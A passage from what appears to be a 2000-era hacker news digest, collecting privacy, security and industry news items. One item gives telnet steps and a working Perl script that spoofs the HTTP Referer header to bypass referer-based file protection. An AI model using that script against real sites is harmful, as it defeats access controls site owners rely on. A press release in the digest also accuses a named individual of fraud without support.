School. He was also interested in reducing his commute to Cambridge. The nice thing about Brookline, Smith said, is that it feels like a college town without having a college in it. ''I grew up in the South in a college town,'' he said. ''So I felt comfortable about that.'' His privacy passion stemmed from a furor last year about a ''leaky window'' in the Pentium III chip. Critics claimed the chip could have made all Internet transactions traceable, by leaving a discernible code number. Smith found many older computers and browsers were already potentially traceable in the same way. So what's the big deal? ''These numbers are sort of like a Social Security number,'' he said. ''If you keep using the same identification number, different databases can be correlated. So you're not anonymous; they can uncover your name, address, and phone.'' Smith believes user traceability could lead to an increased amount of junk mail and calls; for instance, if you check up on mortgage rates in the morning on the Web, you could get an evening call from a mortgage banking firm. ''Marketing firms claim that they are only planning to use this information to target their audiences better,'' he said. ''I don't buy that. Smith has found that agencies that put those flashing banner ads on Web sites also collect data on what people at a site are typing or clicking on, one reason the ads become increasingly relevant to your Lycos or AltaVista search, for instance. ''But nobody tells you this is happening,'' Smith said. ''And we don't know how they are using the information, there's no disclosure. Is it more than market research?'' Certain software that one can download from the Internet, such as the comic cursors from Comet Cursor, will tell a central server where someone is surfing; and Real Jukebox, once downloaded, can tell a central server what music CDs a user subsequently listens to on their computer. Also, some spam (unsolicited direct marketing e-mail) contains code to let a central computer know if the recipient opened the mail. ''The problem is it doesn't let you choose whether to let them know, but they now know if you are interested in this product,'' he said. ''It is potentially crossing the line of overriding user desires.'' Smith is particularly incensed about Comet Curser, which is aimed at children. A visit to a children's Web site will trigger an option to download the software to change your cursor to a particular comic book character. If you decline, the question pops up again every time you visit the site. ''The nag factor alone is annoying,'' he said, but that the cursor software once downloaded then reports your presence on future Web sites that have the customized cursor option to an unknown central computer is ''kind of creepy.'' ''The question is what is this company is going to do with this information?'' Smith thinks some company snooping will eventually have to be regulated for it to stop. ''It's a matter of awareness first,'' he said. ''But inevitably, there will be regulating so that profiling'' the collection of data about you and your consumer preferences ''is an explicit option you consent to.'' To get rid of some tracking, users can install software that disables so-called ''third-party cookies.'' Cookies, in Internet parlance, are small programs in your personal computer that allow a Web site you've visited before to recognize you. That's why a particular airline site knows to open at reservations to your favorite city first, or why a book site might give you increasingly relevant book suggestions. Cookies are not all bad, Smith argues, but you should be told they are there. Another option is so-called anonymizer software, which covers your Web tracks by using a central server or by stripping out cookies. Smith looked into three of these, however, and found it is possible to break them, although it's not necessarily being done. Smith's passion now is strictly volunteer. He estimates he spends about 30 hours researching a topic before dropping a carefully crafted media bomb. He could, he said, eventually do it for pay. He helped track down the New Jersey-based creator of the Melissa virus that attacked thousands of computers last March, and it was his research that led Real Networks Inc. to agree to publish a software ''patch'' to prevent its product, Real Jukebox, from collecting information on users. Some companies with snooper functions on their Web sites have approached him to help prevent future embarrassments. For the moment, Smith says, he prefers his volunteer detective work, which he does on two computers in the third-floor office of his cavernous home with a view of the Boston skyline. He is kept company by wife Faina, daughter Polina, and a new puppy, a failed attempt by Faina to force him to walk outside more and meet the neighbors. ''I expect at some time I'll go stir crazy,'' he said of his current home-office isolation. ''But so far, I've been pretty busy talking on the phone; I haven't needed to get out.'' This story ran on page 01 of the Boston Globe's City Weekly on 1/2/2000. © Copyright 1999 Globe Newspaper Company. @HWA 47.0 Interview with Adam Penenberg 01/04/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by dave920 Black Market Enterprises conducted an interview with Adam Penenberg of Forbes Magazine as part of the new section of BME Online: HYPE. Penenberg is the author of numerous technical articles including ones about AntiOnline, Se7en and other underground events. The article includes personal impressions of Penenberg as well as the interview itself. The article can be found at: Black Market Enterprises http://www.b-m-e.com/features/hype-penenberg.html HYPE Interview with : Adam Penenberg, 37, of New York City, New York dave920: What is your greatest fascination with computers? Adam Penenberg: I'm not so much interested in computers as I am with the broader issue of technology, primarily the way it changes us, our culture and our way of thinking. Ever go to a rock concert only to be disappointed the band doesn't sound as good live as it did in the studio? The drums are too loud, the bass fuzzy, the acoustics suck, the vocals don't sound as sweet? But that's real music; it's recorded music that's not real. Yet we have been influenced by the unattainable "perfection" of recorded music. It's more real to us than real music. This is just one way we have been influenced by technology. Another is online chat. In some instances someone's online moniker becomes more important, more real to him, then his real world name. And the experiences he has in cyberspace--the online conversations, flirtations and dalliances, his triumphs and tribulations--become more important to him than his real-world experiences. This is certainly true for some software pirates and hackers who hang out on IRC all night. Technology is changing who we are and how we think. As a journalist I believe there's nothing more worthy of coverage. Who or what introduced you into journalism, and what made you decide to focus on the computer industry? I got into journalism by accident. In 1991, after living and traveling abroad for 4 years (and utterly clueless as to what I would do with my life) I was walking by Katz's Deli on the Lower East side of New York. Katz's has this ancient sign: "Send a salami to your boy in the army." ("Salami" and "Army" rhyme when you say them New Yawk style.) It was the time of Desert Storm and I noticed Katz's was shipping salamis to soldiers in the Middle East. I pitched it to The New York Times Living section and long story short they published it, even though I had no prior experience. I thought, This freelance writing is easy, then practically starved for years. When I started writing for The Sunday New York Times Long Island section in the mid 1990s, "the guyland" was transitioning into a tech economy. Until then I was writing environmental stories for the Times, since there was always some environmental disaster happening. But then I got a taste of tech and have focused on it ever since. My favorite Times lead for a tech story I wrote: "Flying through a virtual colon, according to Dr. Ari Kaufman, is a lot like playing a Star Wars video game." Have you previously been recognized for your contributions to the computer industry? If so, what were they? Nope, not by the computer industry. How often do you use your computer(s), and what do you mainly use them for? Every day. I use a Mac G3 laptop at home and a G3 desktop at work. Basic stuff, mostly net surfing and email. I learned on a Mac in college and like the interface. I like the fact that you plug something in, it works immediately. I like that Mac has always been Y2K compliant. I detest the Windows OS--there's something creepy about it if you ask me--and dislike the feel and touch of most PCs. If you don't understand just ask a Mac user for a demonstration. Are you afraid of Y2K? What do you think will happen? I'm not afraid of Y2K. I'm afraid of people's reaction to unknown fears. I figure we would have experienced Y2K-related glitches by now, since many payroll databases look ahead months. Or how about the Sept. 9th trigger date (9999 is an error code, so they say), which didn't trigger anything? Ho hum. There may be minor glitches but I can't imagine anything that bad happening here. Like on the cale of that awful NBC Movie "Y2K". But that's not to say nothing will happen. You have to assume phone circuits will be overloaded right after midnight, as people call to wish each other Happy New Year. And I'm thinking that we as humans will burn record amounts of energy, as the lights stay on in 18 time zones. All night. Everywhere. Lights could flicker on and off, though I doubt there will be Y2K-related brownouts. Phones could go out at the same time. And people could mistake this for Y2K Armageddon. Pull up a chair and pass the chips and salsa. The Revolution will not be televised. If you could use a computer to significantly change the world in one way, what would it be? Why? If I could use a computer to change anything, it would be the educational system in this country. Get kids excited about learning. Make it challenging and fun and interesting and relevant. For too long children have been let down by irresponsible politicians willing to spend billions on pork barrel projects but little on text books and teachers. It's shameful and it's not getting better. Another thing: I'd make the Ray Charles version of "America the Beautiful" our National Anthem. What do you enjoy about working for Forbes.com? What other organizations have your written for or worked at? Actually I'm a columnist for Forbes.com and a senior editor at the magazine. As a columnist for the Web site I get to stretch out and explore topics that interest me, from cyberterrorism to politics and activism to hackers and e-commerce. A column is an opinion piece, and I have a lot of opinions. And I like being on the Net. At the magazine I write investigative pieces, usually with a technology focus. For instance, my last article for the magazine was a cover story called "The End of Privacy". (http://www.forbes.com/forbes/99/1129/6413182a.htm) I had an online information broker investigate me and within a week he pulled up my social security number, date of birth, salary, bank balances, long distance phone records and utility bills (how much I pay for gas and electric). I've also written about Kevin Mitnick, who I interviewed a number of times, The New York Times hackers and Netbus's battle against Symantec and Norton. For an information junkie like me, I have the perfect job. Before Forbes, I was at Forbes.com. Before that, I wrote for Wired after they launched their news service on Thanksgiving 1996. And before that I freelanced regularly to The New York Times, including the Sunday Book Review. I also sold pieces to Playboy, Glamour and World Art, among others. I've been to Cuba and Mexico for stories I did for environmental magazines. How do you obtain subject matter for your articles, and what do you primarily enjoy to focus on? I get stories a whole bunch of ways. Sometimes I'll surf around and something will catch my eye. Or someone will email me a tip. At times a publicist will call with a good idea. Or my editor might tell me to do a story on, say, MP3, and I'll find an angle. You just have to have a nose for a good story. They're everywhere. What was your overall intention when you published the article about JP, founder of AntiOnline? What type of feedback did you receive from it? Did JP threaten you or Forbes.com, as he has so many others, with a lawsuit? Nah, JP hasn't threatened anything or said anything, except to crow about the fluff piece about him that ran in the New York Times. What is with the Times tech coverage? They consistently repeat the John Markoff-inspired canard that Kevin Mitnick hacked NORAD as a teen ager--the inspiration for the movie War Games, the Times claims--yet never checked it out. (It's bogus.) Then they publish a sloppy wet kiss about JP that, well, all I'll say is they should have fact-checked it first. The feedback on my column was 100% positive. Every single email. And I got lots of email, too. It also provoked discussion on Slashdot. Seems JP doesn't have many supporters. My intention was to stand up to JP on the issue of his using lawsuits to get his way. I figured he can't possibly have the money for a lawsuit, that he's just using it as a cynical tool of manipulation. And even if he did have the money, what sane person running a start up would waste precious venture capital on a slander lawsuit? What do you think your greatest accomplishment regarding computers was? I have no acomplishments regarding computers. Do you find that because of your profession, computers have occupied more of your life than they should? Why or why not? I stay away from computers outside of work. I keep my life as untechnical as possible. So I don't think I'm a candidate for a monitor tan. What was your favorite article that you wrote? That someone else wrote? Most of my daily reading is online, except for The Times, which I still read over coffee. I don't have any specifiic favorite sites. I bounce around a lot. Often readers or friends point me to stories on the Net. Some stories of mine: (There's a complete list on Forbes.com [at] http://www.forbes.com/columnists/penenberg/past.htm) 1. "Hacking Bhabha: The inside story of the hack of India1s primo nuclear research center" (http://www.forbes.com/tool/html/98/nov/1116/feat.htm) 2. "We were long gone when they pulled the plug" (about The New York Times hackers) (http://www.forbes.com/forbes/98/1116/6211132a.htm) 3. "Going once, going twice, HACKED!" (http://www.forbes.com/tool/html/99/mar/0319/side1.htm) 4. "The demonizing of a hacker" (Kevin Mitnick profile) (http://www.forbes.com/forbes/99/0419/6308050a.htm) With regards to your column on Forbes.com, what do you think influences other Internet users the most? I'd like to think Net users are most influenced by their own experiences, and make decisions based on their own surfing. Like online trading. More people are participating in the economy than ever before. We all have a stake. It's exciting. And the reason is that regular web surfers and surferettes realized they didn't need a broker to tell them how to invest their money; they could do it based on their own experiences. That's one reason I believe Amazon stock shot so high. Users liked the Amazon shopping experience so much they thought, Heck, if I like it, lots of people'll like it, and keep coming back to buy books. So why not invest in the company's stock? I don't want to influence anybody. I just want people to read my column, read my feature stories for the magazine, and think for themselves. I'd rather raise a question than offer an answer. I'm passionate about my writing, am excited about the issues and the information and the personalities of the cyberage, and hope this comes across to the reader. What is your current view on free-speech on the Internet? Do you feel harmful subject matter should be banned from being posted on websites? I don't believe in censorship. If I did I might be its next victim. What is your favorite hobby or pastime? Your favorite Web site? Bike tripping. Few things better than packing up the bike--panniers, tent, sleeping bag, cook set--and taking off, camping off road. Fave Web site: None, or many. I jump around a lot. I spend a lot of time on Dow Jones Interactive, pulling up research. Why did you agree to our invitation to interview you? Because I spend my life trying to demystify technology, the least I could do was demystify myself. @HWA 48.0 KISA Discovers Y2K Bug 01/04/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by cult hero The Korea Information Security Agency (KISA) (who?) discovered a Y2K computer bug that was in the process of attacking 477 other systems. (Something must have gotten lost in the translation because first they call it a Y2K bug then they label it as a worm and a virus, which is it?) Digital Chosun http://www.chosun.com/w21data/html/news/199912/199912310137.html Unix Millennium Bug Discovered A spokesperson for Korea Information Security Agency (KISA) announced on Friday that it had discovered a millennium computer bug while investigating a hacking incident reported by a corporation. It also mentioned that the bug was in the process of attacking 477 computers when they found it. The program was similar to a worm virus, but while most worms attack internet linked computers using the "Windows" operating system, this one was programmed to automatically find weaknesses and attack computers utilizing "Unix." In 1998 a similar virus found in the States caused 7,500 government and public institution servers to crash within 24 hours. (Lee Ji-hun, jhl@chosun.com) @HWA 49.0 Sprint Says 'Area 51' Does Exist 01/04/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by bart A standard service disruption report filed with the Federal Communications Commission by Sprint lists an outage on December 22, 1999 that includes "Las Vegas, NV - Pahrump, NV - Military Base 'AREA 51'". (Hmmm, I guess even places that don't exist need phone service.) Federal Communications Commission - PDF file http://www.fcc.gov/Bureaus/Engineering_Technology/Filings/Network_Outage/1999/reports/99-228.pdf @HWA 50.0 Spoofing your HTTP referrer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.datatrendsoftware.com/spoof.html How to Spoof HTTP_Referer (or any other browser passed variable) To see an ELEMENTARY way to spoof any referer value, you'll need telnet, and a way to see the referer value that your server records (server logs always have the referer value in them). Try the following: (if your homepage isn't index.html, replace it with home.htm or whatever) telnet www.yoursite.com 80 (press return) GET /index.html HTTP/1.0 (press return) Referer: http://www.hah-hah.com (press return) (press return again) Now, check your server logs, and you'll see that "someone" from hah-hah.com grabbed your homepage. If you are trying to "protect" a file by making sure that the referer value (or any other browser passed variable) is your own website, you can be bypassed by this simple technique. Perl script to do the same deed: #!/usr/bin/perl # # Web Spoof # Pavel Aubuchon-Mendoza [admin@deviance.org][http://www.deviance.org] # # Summary: # Works as a normal command line web retrieval script, # except will spoof the referer. This can be left to the script to do, # or specified in the command line. This will bypass any kind of reference # checking, in most cases. Will also screw up the REMOTE_HOST variable which # some cgi scripts use, but the correct IP will of course be sent. Default # broswer is Netscape 4.5 under Win95. This can be changed in the script. # # Usage: - default output is standard out, to save to a file # you will need to redirect it, especially for # binary/image files - # # ./webspf.pl [file] # # Examples: # # ./webspf.pl language.perl.com/info/software.html > software.html # - referer would be language.perl.com/info/index.html - # # ./webspf.pl www.linux.org/images/logo/linuxorg.gif > penguin.gif # - referer would be www.linux.org/images/logo/index.html - # # ./webspf.pl www.linux.org/ www.freebsd.org/whatever.html > index.html # - referer would be www.freebsd.org/whatever.html - # # # use IO::Socket; $loc = $ARGV[0]; # www.a.com/test.html $temp = reverse($loc); # lmth.tset/moc.a.www $host = substr($temp,rindex($temp,"\/")+1); # moc.a.www $host = reverse($host); # www.a.com $dir = substr($loc,index($loc,"\/")); # /test.html $referer = $ARGV[1]; # if($referer eq "") { # true $temp = substr($temp,index($temp,"\/")+1); # /moc.a.www $temp = reverse($temp); # www.a.com/ $referer = $temp . "index\.html"; # www.a.com/index.html } # spoofed referer! print STDERR "\nWebSpoof v1.0 : 12/18/1998\n"; print STDERR "Pavel Aubuchon-Mendoza + http://www.deviance.org\n\n"; $res = 0; $handle = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => 80) or $res = 1; if($res eq 0) { $handle->autoflush(1); print STDERR "\[Connected to $host\]\n"; print $handle "GET $dir HTTP/1.0\n"; print $handle "Referer: $referer\n"; print $handle "Connection: Close\n"; print $handle "User-Agent: Mozilla\/4.5 [en] \(Win95\; I\)\n"; print $handle "Host: $host\n"; print $handle "Accept: image\/gif\, image\/x-xbitmap\, image\/jpeg\, image\/pjpeg\, image\/png\, *\/*\n"; print $handle "Accept-Encoding: gzip\n"; print $handle "Accept-Language: en\n"; print $handle "Accept-Charset: iso-8859-1\,\*\,utf-8\n\n"; while($temp ne "") { # read some headers $temp = <$handle>; chop($temp);chop($temp); @sort = split(/:/,$temp); if(@sort[0] =~ /server/i) { print STDERR " \[$temp\]\n"; } if(@sort[0] =~ /date/i) { print STDERR " \[$temp\]\n"; } if(@sort[0] =~ /content/i) { print STDERR " \[$temp\]\n"; } } print STDERR "\[Recieving data\]\n"; binmode(STDOUT); while(<$handle>) { print "$_"; } close($handle); print STDERR "\[Connection Closed\]\n"; } else { print STDERR "\[Could not connect to $host\]\n"; } @HWA 51.0 OSALL removed from the net. 01/13/00 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Press release: Owl Services 1/13/00 FOR IMMEDIATE RELEASE OSAll (www.aviary-mag.com) is a leading computer security Web site, specializing in original news stories and methodology for computer security professionals. The magazine has been featured in the likes of US News & World Report, CNN, Fox News, PC World and many other media organizations. On Friday January 8, 2000, OSAll (www.aviary-mag.com) was taken off of its' Web server and all Internet connectivity was lost. Any attempts to contact aviary-mag.com for e-mail, FTP, http or other purposes will simply be rebuffed by the current host. Reasons The reason for this disconnection is not currently known, but rumors have begun to abound. This press release is intended to do several things - particularly attempt to settle those rumors. JP Vrasenevich, Frank Jones, the US Government and others have all had reason to disconnect OSAll. Of these, the only one who has definitely tried to have OSAll disconnected is Mr. Vrasenevich, Webmaster and founder of AntiOnline. Vrasenevich has been complaining about OSAll to Communitech.net, the former host, for almost a year. Communitech.net added a Do Not Disconnect notice to the account, explaining that they would ignore Vrasenevich for the time being. Apparently these efforts have either been misplaced or Frank Jones has gotten to Communitech.net. Frank Jones is President of Codex Data Systems, a fraud of a computer security company. They offer $500 a-head-lectures that explain that you need to use firewalls and claim to sell a product called "DIRT" to the Federal Government. Unfortunately, Frank Jones' probation for a conviction on defrauding the US Government prevents him from doing business with the FBI or any other federal agency. OSAll published an article regarding their lectures, and Frank Jones was hardly happy about it. Is OSAll Returning? Yes! NWO.net, the San Diego 2600 (sd2600.net), Radiusnet.net and several other sites have begun hosting mirrors of OSAll. NWO.net and the San Diego 2600 are exploring finding a permanent host for OSAll. In the mean time, you can find OSAll at NWO.net/osall and Radiusnet.net/~owl. Starting on Wednesday, OSAll will be updated according to its normal schedule. -- Mike @HWA 52.0 $10,000 USD up for grabs in PSS Storm Chaser 2000 white paper ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://packetstorm.securify.com/contest.html Packet Storm: Storm Chaser 2000 The talk of distributed attack tools is causing quite a stir. Obviously we are seeing just the tip of the iceberg with what is to come; attacks which involve factors such as encryption, mobility, stealth, that are under anonymous control, that update themselves, that use communication to co-ordinate, that are controlled by hacktivists, cyberterrorists, cybermilitia and, of course, governments. The Internet is truly becoming the fourth battlefield, built on top of not just a civilian, but an academic infrastructure. How do we defend our part of the Internet against information warfare? Obviously there are more factors involved than just a technical solution; we need to consider issues of policy, international co-operation and co-ordination, and administration. But can we really wait for governments and politicians to solve this problem when technology increasingly outstrips policy? With this in mind, Packet Storm poses this question: What pure or applied technical measures can be taken to protect the Internet against future forms of attack? The Kroll-O'Gara Information Security Group and Packet Storm will offer USD $10,000 for the best technical white paper which defines the problem and answers the above question. Competition Rules are outlined below. Winners will be announced at RSA 2000 in January. Competition Rules QUESTION Kroll-O'Gara Information Security Group, Inc. ("Kroll-O'Gara ISG") and Packet Storm, a website sponsored by Kroll-O'Gara ISG (collectivelly, the "Sponsors") will offer USD $10,000 for the best technical white paper which defines the problem and answers the following question: "What pure or applied technical measures can be taken to protect the Internet against future forms of attack?" ELIGIBILITY The Competition may be entered by anyone worldwide. The judges of the Competition and all employees working with or associated with the Sponsors or their affiliated companies or the review panel are not qualified and may not participate in the competition. Multiple entries by an individual are acceptable. Each entry must be original and have its own entry form. Multiple authors for a paper are allowed. SUBMISSION FORMAT Each entry shall consist of sufficient words to rigorously explore the entrant’s proposed solution(s) to the satisfaction of the review panel. All entries must be submitted in electronic form and include the author’s name, address, telephone number and E-mail address. ASCII text and PDF are the preferred formats for entry. Hand written or hard copy entries will not be accepted. All papers will be made public from the Packet Storm web site at http://packetstorm.securify.com after the winner is determined. All entries must be sent electronically to: pss2000@packetstorm.securify.com Sponsors reserve the right to modify the rules at any time. Current rules of the competition are available at: http://packetstorm.securify.com/contest.html Entries may be encrypted using the pss2000 key, available on: ldap://certserver.pgp.com/. Each entrant must complete an Affidavit of Eligibility and Liability and Publicity Release, except where prohibited by law. The completed Affidavit of Eligibility and Liability and Publicity Release must be attached to the end of the submission. Failure to include a completed Affidavit of Eligibility and Liability and Publicity Release as part of the submission will result in the disqualification of the submission. The form of the Affidavit of Eligibility and Liability and Publicity Release can be found at http://packetstorm.securify.com/contest.html. REVIEW PANEL The essays will be judged by a panel of security experts. The panel will include at least two employees of the Kroll-O'Gara ISG as well as at least 3 other individuals selected by Kroll-O'Gara ISG from leaders in industry, government, and academia. JUDGEMENT CRITERIA: Each eligible essay shall be judged on the basis of a 100 point scale using the following criteria: Creativity Design and architecture Scaleability Technical merit For applied solutions, implementation feasibility For pure, or theoretical papers, originality and depth of analysis DEADLINE All entries must be received at pss2000@packetstorm.securify.com no later than midnight, PST on January 10, 2000 (as judged by our mail server, and no, you do not get an extension if the date on our mail server is hacked). The winner of the Competition will be publically announced at RSA2000, held January 16-20, 2000 in San Jose, CA. If the winner refuses in writing to accept the Competition prize, then the prize will be donated to the Electronic Freedom Foundation. NOTIFICATION The winner will be notified via e-mail and telephone. COPYRIGHT AND PUBLICATION The submission of an entry constitutes an assignment to Sponsors of all copyrights arising under both statute and the common law and all other rights derivative therefrom of the entry. By entering the Competition, entrants grant further permission for Sponsors to publish all or part of the submitted essay and to use entrant's name in connection therewith. STATE, FEDERAL AND INTERNATIONAL REGULATIONS: This Competition is subject to the provisions of all applicable International, Federal, State, and regulations. This offer is void where prohibited. Taxes, customs duties, fees, freight charges, and other related charges on prizes are the sole responsibility of the winner. ADDITIONAL TERMS The Competition is subject to all applicable state and federal laws, shall not conflict with any existing law and is void where prohibited. Sponsors are not responsible for lost, late, incomplete, illegible, or misdirected e-mail, for failed, partial or garbled computer transmissions, or for technical failures of any kind. Sponsors reserve the right to cancel or modify the Comptetition for any reason and at their sole discretion. Sponsors' only obligations are to submit entries from eligible entrants to the review panel according to the procedures and criteria set forth in these Competition Rules and to award the prizes set forth herein, subject to the terms, conditions and contingencies delineated herein. By submitting an entry, entrant agrees that Sponsors' obligations are fair and adequate consideration for any entry submitted and that entrant is not entitled to and shall not seek any further compensation. By participating in the Competition, entrant indemnifies Sponsors and their respective directors, officers, employees, agents and affiliates and waives all claim to intellectual property rights in the entry, including patent rights and copyrights, and waives all other publication rights, except where prohibited by law. To the extent that such waiver is ineffective or unenforceable, entrant hereby grants Sponsors an unlimited, unrestricted, perpetual, non-exclusive, transferable, royalty-free license to use, copy, modify, display, and sublicense the entry and any and all derivative works without geographical limitations or further compensation to entrant of any kind and entrant waives any and all rights to which entrant may be entitled, other than those set forth herein. Entrant agrees that e-mail shall satisfy any written requirement which may apply to intellectual property licenses. Upon request of Sponsors, entrant agrees to obtain written consent from the owner of the copyright in the application, if that person is not entrant, and to execute any documents required to effectuate the terms of these Competition Rules. As a condition of entering this Competition, entrant agrees that: (1) any and all disputes, claims, and causes of action arising out of or connected with this Competition, or any prizes awarded, shall be resolved individually, without resort to any form of legal action, and exclusively by arbitration under the International Arbitration Rules of the American Arbitration Association in San Francisco, California; (2) no claim, judgment or award shall be made against entrant's costs incurred, including but not limited to legal costs, costs of labor, benefits, salaries or the value of time expended by entrant or others in any manner relating to, arising under, or resulting from entrant's participation in the competition; (3) under no circumstances will entrant claim punitive damages and entrant hereby waives all rights to claim punitive, incidental and consequential damages and any other special, implied or derivative damages. The Competition Rules, or the rights and obligations of entrant and Sponsors in connection with the Competition, shall be governed by, and construed in accordance with, the laws of the State of California, U.S.A. All pertinent federal, state, and local laws and regulations apply. Odds of winning are dependent upon the number and quality of entries received. Prizes must be accepted as awarded at the judges discretion and are non-assignable and non-transferable. All judgements by the review panel are final. The Sponsors reserve the right to not issue an award should the review panel reach a consensus that none of the submitted entries reach a sufficient quality level. For further information email: pss2000@packetstorm.securify.com. @HWA 53.0 Bill Gates hands over CEO hat to Steve Ballmer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.microsoft.com/presspass/press/2000/jan00/final25anv.htm Bill Gates Promotes Steve Ballmer to President and CEO; Gates Creates New Role as Chairman and Chief Software Architect Gates and Ballmer preview strategy to transform company around Internet User Experience and Next Generation Windows Services REDMOND, Wash. -- Jan. 13, 2000 - Accelerating the company's major strategy initiative, Microsoft Corp. today announced that its co-founder, Bill Gates, has created a new role for himself -- Chairman and Chief Software Architect -- so that he can dedicate all of his time to helping drive the next generation Windows Internet platform and services. Microsoft announced that Steve Ballmer becomes president and CEO, and will take over management of the company. These changes were announced following the release of Microsoft® Windows® 2000, which the company said is a crucial building block of its strategy to focus on software services -- a major technology shift that will transform the industry in the way the Graphical User Interface (GUI) and the Internet did. Driving this major shift is the need for a better Internet User Experience to enable businesses, consumers and developers to better personalize and tailor the services they use, and to store and share the information they need -- any time, any place and on any device. At the core of this strategy are Microsoft's plans, announced today, to assemble the first Internet-based platform of Next Generation Windows Services (NGWS), which will power new products and services and incorporate such features and capabilities as a new user interface, natural language processing, application development approach, schema and new file system -- all of which have been in development. As part of this platform, Microsoft said that a key set of NGWS will be hosted on the Internet and will be infused into future versions of Windows. The NGWS platform will create a host of new opportunities for other businesses, and is the foundation of the company's software services strategy, first articulated in September of last year at Microsoft's developer strategy day and described in further detail during Bill Gates' November 1999 Comdex speech. "It is a great pleasure for me to announce that Steve Ballmer -- my long-term partner in building Microsoft and a great business leader -- is being named CEO," said Gates. "These are dramatic times in our industry. As we look ahead to what it will take to do an amazing job executing against our new strategic direction of building next-generation services for our customers, we recognize that we must refocus and reallocate our resources and talents against our key priorities and challenges." "I'm returning to what I love most -- focusing on technologies for the future. This was a personal decision, one I have discussed with Steve and our board of directors for some time. Although I've been able to spend more time on our technical strategy since naming Steve as president in July 1998, I felt that the opportunities for Microsoft were incredible, yet our structure wasn't optimal to really take advantage of them to the degree that we should. Steve's promotion will allow me to dedicate myself full-time to my passion -- building great software and strategizing on the future, and nurturing and collaborating with the core team helping Steve run the company." Gates also indicated that Ballmer would become a member of the Microsoft Corp. Board of Directors effective January 27. "I am very excited and very honored," said Ballmer. "These are amazing times full of remarkable opportunities. Microsoft has all of the right stuff -- great people and great technology -- to dramatically take action on a new strategy that builds on the company's heritage of applying software know-how to the new world of software services -- a world we will pioneer along with our partners. "Software is the key to the future. It will drive and accelerate innovations in hardware, wireless, broadband, e-commerce and other fields. Our vision is to create a new services platform that will ignite new opportunities for literally thousands of partners and customers around the world," Ballmer said. Setting Priorities: Microsoft Next Generation Windows Services (NGWS) Ballmer today outlined his core priorities and announced plans for a major strategy day this Spring, when the company will outline details of the Internet User Experience vision and strategy. Ballmer said Bill Gates and Microsoft's four technical group vice presidents, including Paul Maritz, Jim Allchin, Bob Muglia, and Rick Belluzzo, will drive developing the technologies and user scenarios that are key to the success of the Internet User Experience and Next Generation Windows Services. About Microsoft Founded in 1975, Microsoft (Nasdaq "MSFT') is the worldwide leader in software for personal and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device. For more information, media only: Rapid Response Team, Waggener Edstrom, (425) 450-5019, rrt@wagged.com For more information, financial analysts only: Carla Lewis, senior director, Microsoft Investor Relations, (425) 936-3703 Note to editors: If you are interested in viewing additional information on Microsoft, please visit the Microsoft Web page at http://www.microsoft.com/presspass/ on Microsoft's corporate information pages. @HWA 54.0 First Windows 2000 virus found ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Twstpair http://www.maximumpc.com/content/2000/01/14/10598 First Windows 2000 Virus Discovered Maximum PC The first Windows 2000 specific virus was discovered earlier this week. It was sent to research labs by the virus's author, apparently, and spreads only on systems that have Windows 2000 installed. The virus, which experts think is no big deal at this time because it doesn't take exploit potential security holes, isn't in actual circulation yet. However, major antivirus software makers are already making claims that the virus will be detected by their software because of the way it works. The virus, known as W2K.Installer.1676, only attempts to detect the operating system it is installed upon and upon confirmation of a Windows 2000 operating system just spreads. W2K.Installer.1676 is a relatively conventional file virus and doesn't have any significant damage-causing payload. -=- More Via HNN ; http://www2.infoworld.com/articles/en/xml/00/01/13/000113enfsecure.xml?Template=/storypages/printarticle.html First Windows 2000 virus detected By Terho Uimonen Anti-virus software vendor F-Secure announced it has received a sample of the first virus written specifically to operate under Microsoft's forthcoming Windows 2000 operating system. Known as Win2K.Inta, or Win2000.Install, F-Secure does not consider the virus to be a big threat since it has received no reports that the virus is "in the wild," meaning that it has not yet been discovered outside of controlled environments, said Mikko Hyppönen, manager of anti-virus research at the Finland-based company. The virus operates only under Windows 2000 and is not designed to function at all under older versions of Windows. Microsoft is scheduled to start commercial shipments of the new operating system by mid-February. "The interesting thing is that it already exists, not that it is a big threat," Hyppönen said. "It will probably not have much of a life span in the real world since ours, as well as other anti-virus software programs, already can handle it." From now on, however, most new viruses are likely to include compatibility with Windows 2000, Hyppönen added. "Windows 2000 will be a widely-used operating system, and virus writers target the widest possible reach," he said. F-Secure received a sample of the virus via an anonymous e-mail, as did several other leading anti-virus software vendors, Hyppönen said. The virus was probably written by an international group of virus writers known as the 29A virus group, he said. "It is the first Windows 2000 virus, so I think they are mainly after the media attention -- they want their five minutes of fame." Win2K.Inta works by infecting program files and spreads from one computer to another when these files are exchanged. Once infected, the files do not grow in size, according to F-Secure, and the virus is capable of infecting files with the following extensions: EXE, COM, DLL, ACM, AX, CNV, CPL, DRV, MPD, OCX, PCI, SCR, SYS, TSP, TLB, VWP, WPC, and MSI. This list includes several classes of programs that to date have not been susceptible to virus infection, F-Secure said. For example, this virus will analyze Microsoft Windows Installer files (MSI), scan them for embedded programs, and infect them, the company said in a statement. The virus contains this text string, which is never displayed: (Win2000.Installer) by Benny/29A & Darkman/29A, according to F-Secure. Further information about the virus can be found at www.F-Secure.com/virus-info/v-pics . Formerly known as Data Fellows Corp., the Finnish software company was founded in 1988 and late last year changed its name to F-Secure Corp. Its North American headquarters are in San Jose, Calif. F-Secure Corp., in Espoo, Finland, is at www.f-secure.com . Terho Uimonen is a Scandinavian correspondent for the IDG News Service, an InfoWorld affiliate. @HWA 55.0 InterNIC domain name hijacking: "It happens" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Your site may be open to attack vua indirect means, is your InterNIC record secure? did you at least set a password when you registered your domain with Network Solutions? your domain name could be seized by a wiley hacker and redirected to anywhere on the net effectively hijacking your site's focus. Here is an account of such an attack attempt... Minimal background Info: Leading email: ~ :A hax0r (mnemonic of keyr00t) tried this with me and Nokia 